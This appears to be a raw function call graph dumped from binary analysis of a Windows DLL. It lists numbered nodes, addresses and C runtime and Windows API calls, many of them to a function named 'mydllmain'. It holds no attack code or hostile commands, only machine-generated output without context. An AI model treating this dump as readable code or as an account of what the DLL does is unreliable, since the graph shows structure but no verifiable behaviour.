14124 6cdf2f95 14120->14124 14122 6cdf360d 14230 6cdf43db 14122->14230 14322 6cdf3475 14124->14322 14128 6cdf3637 __fread_nolock __FrameHandler3::FrameUnwindToState 14127->14128 14129 6cdf36e2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14128->14129 14130 6cdf3726 __FrameHandler3::FrameUnwindToState 14129->14130 14130->12644 14132 6cdfc90a __EH_prolog3 14131->14132 14146 6cdfc7c9 14132->14146 14134 6cdfc931 __DllMainCRTStartup@12 14134->14106 14136 6cdfc125 14135->14136 14137 6cdfc114 14135->14137 14173 6cdfbfb2 14136->14173 14165 6cdfc1af GetModuleHandleW 14137->14165 14142 6cdfc163 14142->12640 14147 6cdfc7d5 __FrameHandler3::FrameUnwindToState 14146->14147 14154 6ce015d1 EnterCriticalSection 14147->14154 14149 6cdfc7e3 14155 6cdfc824 14149->14155 14154->14149 14156 6cdfc843 14155->14156 14159 6cdfc7f0 14155->14159 14157 6cdfc8d1 14156->14157 14158 6cdfc884 mydllmain 14156->14158 14156->14159 14157->14159 14160 6cdfe224 __freea 17 API calls 14157->14160 14158->14156 14161 6cdfc818 14159->14161 14160->14159 14164 6ce01619 LeaveCriticalSection 14161->14164 14163 6cdfc801 14163->14134 14164->14163 14166 6cdfc119 14165->14166 14166->14136 14167 6cdfc20a GetModuleHandleExW 14166->14167 14168 6cdfc26a 14167->14168 14169 6cdfc249 GetProcAddress 14167->14169 14171 6cdfc279 14168->14171 14172 6cdfc270 FreeLibrary 14168->14172 14169->14168 14170 6cdfc25d mydllmain 14169->14170 14170->14168 14171->14136 14172->14171 14174 6cdfbfbe __FrameHandler3::FrameUnwindToState 14173->14174 14188 6ce015d1 EnterCriticalSection 14174->14188 14176 6cdfbfc8 14189 6cdfbfff 14176->14189 14181 6cdfc17e 14207 6cdfc1f1 14181->14207 14183 6cdfc188 14184 6cdfc19c 14183->14184 14185 6cdfc18c GetCurrentProcess TerminateProcess 14183->14185 14186 6cdfc20a __FrameHandler3::FrameUnwindToState 4 API calls 14184->14186 14185->14184 14187 6cdfc1a4 ExitProcess 14186->14187 14188->14176 14190 6cdfc00b __FrameHandler3::FrameUnwindToState 14189->14190 14191 6cdfc059 14190->14191 14195 6cdfc049 mydllmain 14190->14195 14198 6cdfbfd5 14190->14198 14192 6cdfc06f 14191->14192 14196 6cdfc8fe __DllMainCRTStartup@12 18 API calls 14191->14196 14193 6cdfc08c 14192->14193 14202 6cdfbdf3 14192->14202 14194 6cdfbdf3 __FrameHandler3::FrameUnwindToState mydllmain 14193->14194 14194->14198 14195->14191 14196->14192 14199 6cdfbff3 14198->14199 14206 6ce01619 LeaveCriticalSection 14199->14206 14201 6cdfbfe1 14201->14142 14201->14181 14203 6cdfbe01 14202->14203 14205 6cdfbe1a 14202->14205 14204 6cdfbe08 mydllmain 14203->14204 14203->14205 14204->14203 14205->14193 14206->14201 14210 6ce01655 14207->14210 14209 6cdfc1f6 __FrameHandler3::FrameUnwindToState 14209->14183 14211 6ce01664 __FrameHandler3::FrameUnwindToState 14210->14211 14212 6ce01671 14211->14212 14214 6cdff905 14211->14214 14212->14209 14215 6cdff880 _unexpected 5 API calls 14214->14215 14216 6cdff921 14215->14216 14217 6cdff939 14216->14217 14218 6cdff92a mydllmain 14216->14218 14217->14212 14218->14217 14220 6cdf4396 14219->14220 14222 6cdf2f3a 14219->14222 14221 6cdfb786 ___std_exception_copy 17 API calls 14220->14221 14220->14222 14221->14220 14222->14114 14224 6cdfcac4 14223->14224 14225 6cdfcab2 14223->14225 14239 6ce02c2a 14224->14239 14227 6cdfcac0 14225->14227 14236 6cdffed8 14225->14236 14227->14122 14231 6cdf43ee 14230->14231 14232 6cdf43e4 14230->14232 14231->14120 14296 6cdf4514 14232->14296 14243 6cdffd69 14236->14243 14240 6cdfcad3 14239->14240 14241 6ce02c38 14239->14241 14240->14122 14241->14240 14242 6ce02c40 mydllmain 14241->14242 14242->14241 14246 6cdffcbd 14243->14246 14247 6cdffcc9 __FrameHandler3::FrameUnwindToState 14246->14247 14254 6ce015d1 EnterCriticalSection 14247->14254 14249 6cdffcd3 ___scrt_uninitialize_crt 14250 6cdffd3f 14249->14250 14255 6cdffc31 14249->14255 14263 6cdffd5d 14250->14263 14254->14249 14256 6cdffc3d __FrameHandler3::FrameUnwindToState 14255->14256 14266 6cdfaebd EnterCriticalSection 14256->14266 14258 6cdffc80 14280 6cdffcb1 14258->14280 14259 6cdffc47 ___scrt_uninitialize_crt 14259->14258 14267 6cdffe73 14259->14267 14295 6ce01619 LeaveCriticalSection 14263->14295 14265 6cdffd4b 14265->14227 14266->14259 14268 6cdffe88 __wsopen_s 14267->14268 14269 6cdffe8f 14268->14269 14270 6cdffe9a 14268->14270 14271 6cdffd69 ___scrt_uninitialize_crt 79 API calls 14269->14271 14272 6cdffe0a ___scrt_uninitialize_crt 75 API calls 14270->14272 14273 6cdffe95 14271->14273 14274 6cdffea4 14272->14274 14275 6cdf5f8b __wsopen_s 50 API calls 14273->14275 14274->14273 14276 6cdfcc82 __fread_nolock 50 API calls 14274->14276 14277 6cdffed2 14275->14277 14278 6cdffebb 14276->14278 14277->14258 14283 6ce05b15 14278->14283 14294 6cdfaed1 LeaveCriticalSection 14280->14294 14282 6cdffc9f 14282->14249 14284 6ce05b33 14283->14284 14285 6ce05b26 14283->14285 14287 6ce05b7c 14284->14287 14289 6ce05b5a 14284->14289 14286 6cdfe211 __dosmaperr 17 API calls 14285->14286 14293 6ce05b2b 14286->14293 14288 6cdfe211 __dosmaperr 17 API calls 14287->14288 14290 6ce05b81 14288->14290 14291 6ce05a73 ___scrt_uninitialize_crt 54 API calls 14289->14291 14292 6cdfbcda __wsopen_s 50 API calls 14290->14292 14291->14293 14292->14293 14293->14273 14294->14282 14295->14265 14297 6cdf451e 14296->14297 14298 6cdf43e9 14296->14298 14304 6cdf55e8 14297->14304 14300 6cdf5493 14298->14300 14301 6cdf549e 14300->14301 14303 6cdf54bd 14300->14303 14302 6cdf54a8 DeleteCriticalSection 14301->14302 14302->14302 14302->14303 14303->14231 14310 6cdf54c2 14304->14310 14307 6cdf560e mydllmain 14309 6cdf5618 14307->14309 14308 6cdf561a TlsFree 14308->14309 14309->14298 14311 6cdf54df 14310->14311 14314 6cdf54e3 14310->14314 14311->14307 14311->14308 14312 6cdf554b GetProcAddress 14312->14311 14314->14311 14314->14312 14315 6cdf553c 14314->14315 14317 6cdf5562 LoadLibraryExW 14314->14317 14315->14312 14316 6cdf5544 FreeLibrary 14315->14316 14316->14312 14318 6cdf55a9 14317->14318 14319 6cdf5579 GetLastError 14317->14319 14318->14314 14319->14318 14320 6cdf5584 ___vcrt_FlsFree 14319->14320 14320->14318 14321 6cdf559a LoadLibraryExW 14320->14321 14321->14314 14327 6cdfcad7 14322->14327 14325 6cdf4514 ___vcrt_uninitialize_ptd 7 API calls 14326 6cdf2f9a 14325->14326 14326->12654 14330 6cdfd548 14327->14330 14331 6cdf347c 14330->14331 14332 6cdfd552 14330->14332 14331->14325 14334 6cdff9a3 14332->14334 14335 6cdff880 _unexpected 5 API calls 14334->14335 14336 6cdff9bf 14335->14336 14337 6cdff9da TlsFree 14336->14337 14338 6cdff9c8 mydllmain 14336->14338 14339 6cdff9d5 14338->14339 14339->14331 14340->12628 15084 6cdfc2c7 15085 6cdfc2de 15084->15085 15107 6cdfc2d7 15084->15107 15086 6cdfc2ff 15085->15086 15088 6cdfc2e9 15085->15088 15114 6ce025c4 15086->15114 15090 6cdfe211 __dosmaperr 17 API calls 15088->15090 15092 6cdfc2ee 15090->15092 15093 6cdfbcda __wsopen_s 50 API calls 15092->15093 15093->15107 15099 6cdfc36d 15101 6cdfc404 50 API calls 15099->15101 15100 6cdfc361 15102 6cdfe211 __dosmaperr 17 API calls 15100->15102 15104 6cdfc383 15101->15104 15103 6cdfc366 15102->15103 15106 6cdfe224 __freea 17 API calls 15103->15106 15104->15103 15105 6cdfc3a7 15104->15105 15108 6cdfc3be 15105->15108 15109 6cdfc3c8 15105->15109 15106->15107 15110 6cdfe224 __freea 17 API calls 15108->15110 15111 6cdfe224 __freea 17 API calls 15109->15111 15112 6cdfc3c6 15110->15112 15111->15112 15113 6cdfe224 __freea 17 API calls 15112->15113 15113->15107 15115 6cdfc305 15114->15115 15116 6ce025cd 15114->15116 15120 6ce01fa7 GetModuleFileNameW 15115->15120 15142 6cdfd332 15116->15142 15121 6ce01fd6 GetLastError 15120->15121 15122 6ce01fe7 15120->15122 15123 6cdfe1b7 __dosmaperr 17 API calls 15121->15123 15316 6ce01d25 15122->15316 15125 6ce01fe2 15123->15125 15128 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15125->15128 15129 6cdfc318 15128->15129 15130 6cdfc404 15129->15130 15132 6cdfc42a 15130->15132 15134 6cdfc488 15132->15134 15358 6ce02874 15132->15358 15133 6cdfc34b 15136 6cdfc578 15133->15136 15134->15133 15135 6ce02874 50 API calls 15134->15135 15135->15134 15137 6cdfc589 15136->15137 15141 6cdfc358 15136->15141 15138 6cdff70a _unexpected 17 API calls 15137->15138 15137->15141 15139 6cdfc5b2 15138->15139 15140 6cdfe224 __freea 17 API calls 15139->15140 15140->15141 15141->15099 15141->15100 15143 6cdfd33d 15142->15143 15144 6cdfd343 15142->15144 15146 6cdff9e2 _unexpected 7 API calls 15143->15146 15145 6cdffa21 _unexpected 7 API calls 15144->15145 15164 6cdfd349 15144->15164 15147 6cdfd35d 15145->15147 15146->15144 15148 6cdff70a _unexpected 17 API calls 15147->15148 15147->15164 15150 6cdfd36d 15148->15150 15149 6cdfcb25 __FrameHandler3::FrameUnwindToState 50 API calls 15151 6cdfd3c7 15149->15151 15152 6cdfd38a 15150->15152 15153 6cdfd375 15150->15153 15154 6cdffa21 _unexpected 7 API calls 15152->15154 15155 6cdffa21 _unexpected 7 API calls 15153->15155 15156 6cdfd396 15154->15156 15157 6cdfd381 15155->15157 15158 6cdfd39a 15156->15158 15159 6cdfd3a9 15156->15159 15162 6cdfe224 __freea 17 API calls 15157->15162 15160 6cdffa21 _unexpected 7 API calls 15158->15160 15161 6cdfd079 _unexpected 17 API calls 15159->15161 15160->15157 15163 6cdfd3b4 15161->15163 15162->15164 15165 6cdfe224 __freea 17 API calls 15163->15165 15164->15149 15166 6cdfd34e 15164->15166 15165->15166 15167 6ce023cf 15166->15167 15190 6ce02524 15167->15190 15172 6cdfe25e __fread_nolock 18 API calls 15173 6ce02423 15172->15173 15174 6ce02439 15173->15174 15175 6ce0242b 15173->15175 15208 6ce0261f 15174->15208 15176 6cdfe224 __freea 17 API calls 15175->15176 15179 6ce02412 15176->15179 15179->15115 15180 6ce02471 15181 6cdfe211 __dosmaperr 17 API calls 15180->15181 15182 6ce02476 15181->15182 15184 6cdfe224 __freea 17 API calls 15182->15184 15183 6ce024b8 15186 6ce02501 15183->15186 15219 6ce02048 15183->15219 15184->15179 15185 6ce0248c 15185->15183 15189 6cdfe224 __freea 17 API calls 15185->15189 15188 6cdfe224 __freea 17 API calls 15186->15188 15188->15179 15189->15183 15191 6ce02530 __FrameHandler3::FrameUnwindToState 15190->15191 15198 6ce0254a 15191->15198 15227 6ce015d1 EnterCriticalSection 15191->15227 15193 6ce023f9 15201 6ce02156 15193->15201 15194 6ce0255a 15199 6cdfe224 __freea 17 API calls 15194->15199 15200 6ce02586 15194->15200 15196 6cdfcb25 __FrameHandler3::FrameUnwindToState 50 API calls 15197 6ce025c3 15196->15197 15198->15193 15198->15196 15199->15200 15228 6ce025a3 15200->15228 15202 6cdff5bd __DllMainCRTStartup@12 50 API calls 15201->15202 15203 6ce02168 15202->15203 15204 6ce02177 GetOEMCP 15203->15204 15205 6ce02189 15203->15205 15206 6ce021a0 15204->15206 15205->15206 15207 6ce0218e GetACP 15205->15207 15206->15172 15206->15179 15207->15206 15209 6ce02156 52 API calls 15208->15209 15210 6ce0263f 15209->15210 15212 6ce0267c IsValidCodePage 15210->15212 15217 6ce02744 15210->15217 15218 6ce02697 __fread_nolock 15210->15218 15211 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15213 6ce02466 15211->15213 15214 6ce0268e 15212->15214 15212->15217 15213->15180 15213->15185 15215 6ce026b7 GetCPInfo 15214->15215 15214->15218 15215->15217 15215->15218 15217->15211 15232 6ce0222a 15218->15232 15220 6ce02054 __FrameHandler3::FrameUnwindToState 15219->15220 15304 6ce015d1 EnterCriticalSection 15220->15304 15222 6ce0205e 15305 6ce02095 15222->15305 15227->15194 15231 6ce01619 LeaveCriticalSection 15228->15231 15230 6ce025aa 15230->15198 15231->15230 15233 6ce02252 GetCPInfo 15232->15233 15242 6ce0231b 15232->15242 15238 6ce0226a 15233->15238 15233->15242 15234 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15236 6ce023cd 15234->15236 15235 6ce03a04 __DllMainCRTStartup@12 53 API calls 15237 6ce022d2 15235->15237 15236->15217 15243 6ce06f93 15237->15243 15238->15235 15241 6ce06f93 56 API calls 15241->15242 15242->15234 15244 6cdff5bd __DllMainCRTStartup@12 50 API calls 15243->15244 15245 6ce06fa6 15244->15245 15248 6ce06da4 15245->15248 15249 6ce06dbf 15248->15249 15276 6ce0293d 15249->15276 15251 6ce06f7e 15253 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15251->15253 15252 6ce06ed1 15257 6ce03b05 __freea 17 API calls 15252->15257 15255 6ce022f3 15253->15255 15254 6ce06e03 15254->15251 15254->15252 15256 6cdfe25e __fread_nolock 18 API calls 15254->15256 15258 6ce06e29 __alloca_probe_16 15254->15258 15255->15241 15256->15258 15257->15251 15258->15252 15259 6ce0293d __fread_nolock MultiByteToWideChar 15258->15259 15260 6ce06e72 15259->15260 15260->15252 15279 6cdffaae 15260->15279 15263 6ce06ee0 15265 6ce06f69 15263->15265 15266 6cdfe25e __fread_nolock 18 API calls 15263->15266 15269 6ce06ef2 __alloca_probe_16 15263->15269 15264 6ce06ea8 15264->15252 15268 6cdffaae 8 API calls 15264->15268 15267 6ce03b05 __freea 17 API calls 15265->15267 15266->15269 15267->15252 15268->15252 15269->15265 15270 6cdffaae 8 API calls 15269->15270 15271 6ce06f35 15270->15271 15271->15265 15272 6ce029f7 __wsopen_s WideCharToMultiByte 15271->15272 15273 6ce06f4f 15272->15273 15273->15265 15274 6ce06f58 15273->15274 15287 6ce03b05 15274->15287 15291 6ce028a5 15276->15291 15293 6cdff781 15279->15293 15282 6cdffabf mydllmain 15285 6cdffae4 15282->15285 15283 6cdffae6 15296 6cdffb0b 15283->15296 15285->15252 15285->15263 15285->15264 15286 6cdffaff LCMapStringW 15286->15285 15288 6ce03b11 15287->15288 15289 6ce03b22 15287->15289 15288->15289 15290 6cdfe224 __freea 17 API calls 15288->15290 15289->15252 15290->15289 15292 6ce028b6 MultiByteToWideChar 15291->15292 15292->15254 15294 6cdff880 _unexpected 5 API calls 15293->15294 15295 6cdff797 15294->15295 15295->15282 15295->15283 15301 6cdff79b 15296->15301 15299 6cdffb1c mydllmain 15300 6cdffb2c 15299->15300 15300->15286 15302 6cdff880 _unexpected 5 API calls 15301->15302 15303 6cdff7b1 15302->15303 15303->15299 15303->15300 15304->15222 15306 6cdfba34 __fread_nolock 50 API calls 15305->15306 15307 6ce020b7 15306->15307 15308 6cdfba34 __fread_nolock 50 API calls 15307->15308 15309 6ce020d6 15308->15309 15310 6ce0206b 15309->15310 15311 6cdfe224 __freea 17 API calls 15309->15311 15312 6ce02089 15310->15312 15311->15310 15315 6ce01619 LeaveCriticalSection 15312->15315 15314 6ce02077 15314->15186 15315->15314 15317 6cdff5bd __DllMainCRTStartup@12 50 API calls 15316->15317 15318 6ce01d37 15317->15318 15319 6ce01d49 15318->15319 15342 6cdff945 15318->15342 15321 6ce01eaa 15319->15321 15322 6ce01ec6 15321->15322 15323 6ce01eb7 15321->15323 15324 6ce01ef3 15322->15324 15325 6ce01ece 15322->15325 15323->15125 15326 6ce029f7 __wsopen_s WideCharToMultiByte 15324->15326 15325->15323 15351 6ce01f6c 15325->15351 15328 6ce01f03 15326->15328 15329 6ce01f0a GetLastError 15328->15329 15332 6ce01f20 15328->15332 15330 6cdfe1b7 __dosmaperr 17 API calls 15329->15330 15334 6ce01f16 15330->15334 15331 6ce01f31 15331->15323 15355 6ce01d01 15331->15355 15332->15331 15335 6ce01f6c 17 API calls 15332->15335 15337 6cdfe211 __dosmaperr 17 API calls 15334->15337 15335->15331 15337->15323 15338 6ce01f4b GetLastError 15339 6cdfe1b7 __dosmaperr 17 API calls 15338->15339 15340 6ce01f57 15339->15340 15341 6cdfe211 __dosmaperr 17 API calls 15340->15341 15341->15323 15348 6cdff767 15342->15348 15345 6cdff95f 15345->15319 15346 6cdff953 mydllmain 15347 6cdff95d 15346->15347 15347->15319 15349 6cdff880 _unexpected 5 API calls 15348->15349 15350 6cdff77d 15349->15350 15350->15345 15350->15346 15352 6ce01f77 15351->15352 15353 6cdfe211 __dosmaperr 17 API calls 15352->15353 15354 6ce01f80 15353->15354 15354->15323 15356 6ce029f7 __wsopen_s WideCharToMultiByte 15355->15356 15357 6ce01d1e 15356->15357 15357->15323 15357->15338 15361 6ce02824 15358->15361 15362 6cdff5bd __DllMainCRTStartup@12 50 API calls 15361->15362 15363 6ce02837 15362->15363 15363->15132 15740 6cdfae71 15741 6cdffed8 ___scrt_uninitialize_crt 79 API calls 15740->15741 15742 6cdfae79 15741->15742 15750 6cdffb86 15742->15750 15744 6cdfae7e 15745 6cdffee1 __DllMainCRTStartup@12 17 API calls 15744->15745 15746 6cdfae8d DeleteCriticalSection 15745->15746 15746->15744 15747 6cdfaea8 15746->15747 15748 6cdfe224 __freea 17 API calls 15747->15748 15749 6cdfaeb3 15748->15749 15751 6cdffb92 __FrameHandler3::FrameUnwindToState 15750->15751 15760 6ce015d1 EnterCriticalSection 15751->15760 15753 6cdffc09 15761 6cdffc28 15753->15761 15756 6cdffbdd DeleteCriticalSection 15758 6cdfe224 __freea 17 API calls 15756->15758 15757 6cdfb107 __DllMainCRTStartup@12 80 API calls 15759 6cdffb9d 15757->15759 15758->15759 15759->15753 15759->15756 15759->15757 15760->15759 15764 6ce01619 LeaveCriticalSection 15761->15764 15763 6cdffc15 15763->15744 15764->15763 14341 6cdf2d99 14342 6cdf2dd7 14341->14342 14343 6cdf2da4 14341->14343 14346 6cdf2ef3 __DllMainCRTStartup@12 166 API calls 14342->14346 14344 6cdf2dc9 14343->14344 14345 6cdf2da9 14343->14345 14353 6cdf2dec 14344->14353 14347 6cdf2dbf 14345->14347 14348 6cdf2dae 14345->14348 14352 6cdf2db3 14346->14352 14380 6cdf33f2 14347->14380 14348->14352 14375 6cdf3411 14348->14375 14354 6cdf2df8 __FrameHandler3::FrameUnwindToState 14353->14354 14388 6cdf3482 14354->14388 14356 6cdf2ec1 14356->14352 14357 6cdf2dff __DllMainCRTStartup@12 14357->14356 14358 6cdf2eeb 14357->14358 14359 6cdf2e26 14357->14359 14360 6cdf3621 __DllMainCRTStartup@12 4 API calls 14358->14360 14399 6cdf33e4 14359->14399 14362 6cdf2ef2 14360->14362 14367 6cdf2e43 14407 6cdfbe1e 14367->14407 14368 6cdf2e75 ___scrt_is_nonwritable_in_current_image 14368->14356 14371 6cdf2ead mydllmain 14368->14371 14371->14356 14373 6cdf2e62 14373->14368 14374 6cdfbdf3 __FrameHandler3::FrameUnwindToState mydllmain 14373->14374 14374->14368 14527 6cdfca9f 14375->14527 14731 6cdf43c8 14380->14731 14384 6cdf340e 14384->14352 14386 6cdf43d3 26 API calls 14387 6cdf33fb 14386->14387 14387->14352 14389 6cdf348b 14388->14389 14415 6cdf381b IsProcessorFeaturePresent 14389->14415 14393 6cdf349c 14394 6cdf34a0 14393->14394 14425 6cdfca82 14393->14425 14394->14357 14397 6cdf34b7 14397->14357 14398 6cdf43db ___scrt_uninitialize_crt 8 API calls 14398->14394 14521 6cdf34bb 14399->14521 14401 6cdf2e35 14401->14368 14402 6cdf373e 14401->14402 14403 6cdf374e 14402->14403 14404 6cdf2e3e 14402->14404 14403->14404 14405 6cdf3755 mydllmain 14403->14405 14406 6cdf3308 InitializeSListHead 14404->14406 14405->14403 14406->14367 14409 6cdfbe2a 14407->14409 14408 6cdf2e57 14408->14368 14411 6cdf33b9 14408->14411 14409->14408 14410 6cdfbe30 mydllmain 14409->14410 14410->14409 14412 6cdf33be ___scrt_release_startup_lock 14411->14412 14413 6cdf381b IsProcessorFeaturePresent 14412->14413 14414 6cdf33c7 14412->14414 14413->14414 14414->14373 14416 6cdf3497 14415->14416 14417 6cdf43a9 14416->14417 14428 6cdf5457 14417->14428 14420 6cdf43b2 14420->14393 14422 6cdf43ba 14423 6cdf43c5 14422->14423 14424 6cdf5493 ___vcrt_uninitialize_locks DeleteCriticalSection 14422->14424 14423->14393 14424->14420 14460 6ce02bc2 14425->14460 14430 6cdf5460 14428->14430 14431 6cdf5489 14430->14431 14432 6cdf43ae 14430->14432 14442 6cdf569c 14430->14442 14433 6cdf5493 ___vcrt_uninitialize_locks DeleteCriticalSection 14431->14433 14432->14420 14434 6cdf44e1 14432->14434 14433->14432 14448 6cdf55ad 14434->14448 14437 6cdf44f6 14437->14422 14440 6cdf4511 14440->14422 14441 6cdf4514 ___vcrt_uninitialize_ptd 7 API calls 14441->14437 14443 6cdf54c2 ___vcrt_FlsFree 5 API calls 14442->14443 14444 6cdf56b6 14443->14444 14445 6cdf56bf mydllmain 14444->14445 14446 6cdf56d4 InitializeCriticalSectionAndSpinCount 14444->14446 14447 6cdf56d2 14445->14447 14446->14447 14447->14430 14449 6cdf54c2 ___vcrt_FlsFree 5 API calls 14448->14449 14450 6cdf55c7 14449->14450 14451 6cdf55e0 TlsAlloc 14450->14451 14452 6cdf55d0 mydllmain 14450->14452 14453 6cdf44eb 14452->14453 14453->14437 14454 6cdf565e 14453->14454 14455 6cdf54c2 ___vcrt_FlsFree 5 API calls 14454->14455 14456 6cdf5678 14455->14456 14457 6cdf5687 mydllmain 14456->14457 14458 6cdf5693 TlsSetValue 14456->14458 14459 6cdf4504 14457->14459 14458->14459 14459->14440 14459->14441 14461 6cdf34a9 14460->14461 14463 6ce02bd2 14460->14463 14461->14397 14461->14398 14462 6ce02bda mydllmain 14468 6cdfe038 14462->14468 14473 6cdfe0e8 14462->14473 14463->14462 14464 6ce02bf0 14463->14464 14464->14461 14465 6ce02c08 mydllmain 14464->14465 14465->14464 14469 6cdfe03f 14468->14469 14470 6cdfe082 GetStdHandle 14469->14470 14471 6cdfe0e4 14469->14471 14472 6cdfe095 GetFileType 14469->14472 14470->14469 14471->14463 14472->14469 14474 6cdfe0f4 __FrameHandler3::FrameUnwindToState 14473->14474 14485 6ce015d1 EnterCriticalSection 14474->14485 14476 6cdfe0fb 14486 6ce03076 14476->14486 14479 6cdfe119 14505 6cdfe13f 14479->14505 14484 6cdfe038 2 API calls 14484->14479 14485->14476 14487 6ce03082 __FrameHandler3::FrameUnwindToState 14486->14487 14488 6ce0308b 14487->14488 14489 6ce030ac 14487->14489 14490 6cdfe211 __dosmaperr 17 API calls 14488->14490 14508 6ce015d1 EnterCriticalSection 14489->14508 14492 6ce03090 14490->14492 14493 6cdfbcda __wsopen_s 50 API calls 14492->14493 14494 6cdfe10a 14493->14494 14494->14479 14499 6cdfdf82 GetStartupInfoW 14494->14499 14495 6ce030e4 14516 6ce0310b 14495->14516 14498 6ce030b8 14498->14495 14509 6ce02fc6 14498->14509 14500 6cdfdf9f 14499->14500 14501 6cdfe033 14499->14501 14500->14501 14502 6ce03076 52 API calls 14500->14502 14501->14484 14503 6cdfdfc7 14502->14503 14503->14501 14504 6cdfdff7 GetFileType 14503->14504 14504->14503 14520 6ce01619 LeaveCriticalSection 14505->14520 14507 6cdfe12a 14507->14463 14508->14498 14510 6cdff70a _unexpected 17 API calls 14509->14510 14511 6ce02fd8 14510->14511 14513 6cdffa63 __wsopen_s 7 API calls 14511->14513 14515 6ce02fe5 14511->14515 14512 6cdfe224 __freea 17 API calls 14514 6ce0303a 14512->14514 14513->14511 14514->14498 14515->14512 14519 6ce01619 LeaveCriticalSection 14516->14519 14518 6ce03112 14518->14494 14519->14518 14520->14507 14522 6cdf34cb 14521->14522 14523 6cdf34c7 14521->14523 14524 6cdf3621 __DllMainCRTStartup@12 4 API calls 14522->14524 14526 6cdf34d8 ___scrt_release_startup_lock 14522->14526 14523->14401 14525 6cdf3541 14524->14525 14526->14401 14533 6cdfd24b 14527->14533 14530 6cdf43d3 14713 6cdf4416 14530->14713 14534 6cdfd255 14533->14534 14537 6cdf3416 14533->14537 14535 6cdff9e2 _unexpected 7 API calls 14534->14535 14536 6cdfd25c 14535->14536 14536->14537 14538 6cdffa21 _unexpected 7 API calls 14536->14538 14537->14530 14539 6cdfd26f 14538->14539 14541 6cdfd112 14539->14541 14542 6cdfd12d 14541->14542 14543 6cdfd11d 14541->14543 14542->14537 14547 6cdfd133 14543->14547 14546 6cdfe224 __freea 17 API calls 14546->14542 14548 6cdfd148 14547->14548 14549 6cdfd14e 14547->14549 14550 6cdfe224 __freea 17 API calls 14548->14550 14551 6cdfe224 __freea 17 API calls 14549->14551 14550->14549 14552 6cdfd15a 14551->14552 14553 6cdfe224 __freea 17 API calls 14552->14553 14554 6cdfd165 14553->14554 14555 6cdfe224 __freea 17 API calls 14554->14555 14556 6cdfd170 14555->14556 14557 6cdfe224 __freea 17 API calls 14556->14557 14558 6cdfd17b 14557->14558 14559 6cdfe224 __freea 17 API calls 14558->14559 14560 6cdfd186 14559->14560 14561 6cdfe224 __freea 17 API calls 14560->14561 14562 6cdfd191 14561->14562 14563 6cdfe224 __freea 17 API calls 14562->14563 14564 6cdfd19c 14563->14564 14565 6cdfe224 __freea 17 API calls 14564->14565 14566 6cdfd1a7 14565->14566 14567 6cdfe224 __freea 17 API calls 14566->14567 14568 6cdfd1b5 14567->14568 14573 6cdfcf5f 14568->14573 14574 6cdfcf6b __FrameHandler3::FrameUnwindToState 14573->14574 14589 6ce015d1 EnterCriticalSection 14574->14589 14576 6cdfcf75 14577 6cdfcf9f 14576->14577 14580 6cdfe224 __freea 17 API calls 14576->14580 14590 6cdfcfbe 14577->14590 14580->14577 14581 6cdfcfca 14582 6cdfcfd6 __FrameHandler3::FrameUnwindToState 14581->14582 14594 6ce015d1 EnterCriticalSection 14582->14594 14584 6cdfcfe0 14595 6cdfd200 14584->14595 14586 6cdfcff3 14599 6cdfd013 14586->14599 14589->14576 14593 6ce01619 LeaveCriticalSection 14590->14593 14592 6cdfcfac 14592->14581 14593->14592 14594->14584 14596 6cdfd236 _unexpected 14595->14596 14597 6cdfd20f _unexpected 14595->14597 14596->14586 14597->14596 14602 6ce03477 14597->14602 14712 6ce01619 LeaveCriticalSection 14599->14712 14601 6cdfd001 14601->14546 14603 6ce0348d 14602->14603 14604 6ce034f7 14602->14604 14603->14604 14608 6ce034c0 14603->14608 14613 6cdfe224 __freea 17 API calls 14603->14613 14606 6cdfe224 __freea 17 API calls 14604->14606 14629 6ce03545 14604->14629 14607 6ce03519 14606->14607 14609 6cdfe224 __freea 17 API calls 14607->14609 14610 6ce034e2 14608->14610 14615 6cdfe224 __freea 17 API calls 14608->14615 14611 6ce0352c 14609->14611 14612 6cdfe224 __freea 17 API calls 14610->14612 14614 6cdfe224 __freea 17 API calls 14611->14614 14616 6ce034ec 14612->14616 14618 6ce034b5 14613->14618 14620 6ce0353a 14614->14620 14621 6ce034d7 14615->14621 14622 6cdfe224 __freea 17 API calls 14616->14622 14617 6ce035b3 14623 6cdfe224 __freea 17 API calls 14617->14623 14630 6ce03794 14618->14630 14625 6cdfe224 __freea 17 API calls 14620->14625 14658 6ce03892 14621->14658 14622->14604 14628 6ce035b9 14623->14628 14624 6ce03553 14624->14617 14627 6cdfe224 17 API calls __freea 14624->14627 14625->14629 14627->14624 14628->14596 14670 6ce035e8 14629->14670 14631 6ce037a5 14630->14631 14657 6ce0388e 14630->14657 14632 6ce037b6 14631->14632 14633 6cdfe224 __freea 17 API calls 14631->14633 14634 6ce037c8 14632->14634 14635 6cdfe224 __freea 17 API calls 14632->14635 14633->14632 14636 6ce037da 14634->14636 14638 6cdfe224 __freea 17 API calls 14634->14638 14635->14634 14637 6ce037ec 14636->14637 14639 6cdfe224 __freea 17 API calls 14636->14639 14640 6cdfe224 __freea 17 API calls 14637->14640 14642 6ce037fe 14637->14642 14638->14636 14639->14637 14640->14642 14641 6ce03810 14644 6ce03822 14641->14644 14646 6cdfe224 __freea 17 API calls 14641->14646 14642->14641 14643 6cdfe224 __freea 17 API calls 14642->14643 14643->14641 14645 6ce03834 14644->14645 14647 6cdfe224 __freea 17 API calls 14644->14647 14648 6ce03846 14645->14648 14649 6cdfe224 __freea 17 API calls 14645->14649 14646->14644 14647->14645 14650 6ce03858 14648->14650 14651 6cdfe224 __freea 17 API calls 14648->14651 14649->14648 14652 6ce0386a 14650->14652 14654 6cdfe224 __freea 17 API calls 14650->14654 14651->14650 14653 6ce0387c 14652->14653 14655 6cdfe224 __freea 17 API calls 14652->14655 14656 6cdfe224 __freea 17 API calls 14653->14656 14653->14657 14654->14652 14655->14653 14656->14657 14657->14608 14659 6ce038f7 14658->14659 14660 6ce0389f 14658->14660 14659->14610 14661 6ce038af 14660->14661 14662 6cdfe224 __freea 17 API calls 14660->14662 14663 6ce038c1 14661->14663 14664 6cdfe224 __freea 17 API calls 14661->14664 14662->14661 14665 6ce038d3 14663->14665 14666 6cdfe224 __freea 17 API calls 14663->14666 14664->14663 14667 6ce038e5 14665->14667 14668 6cdfe224 __freea 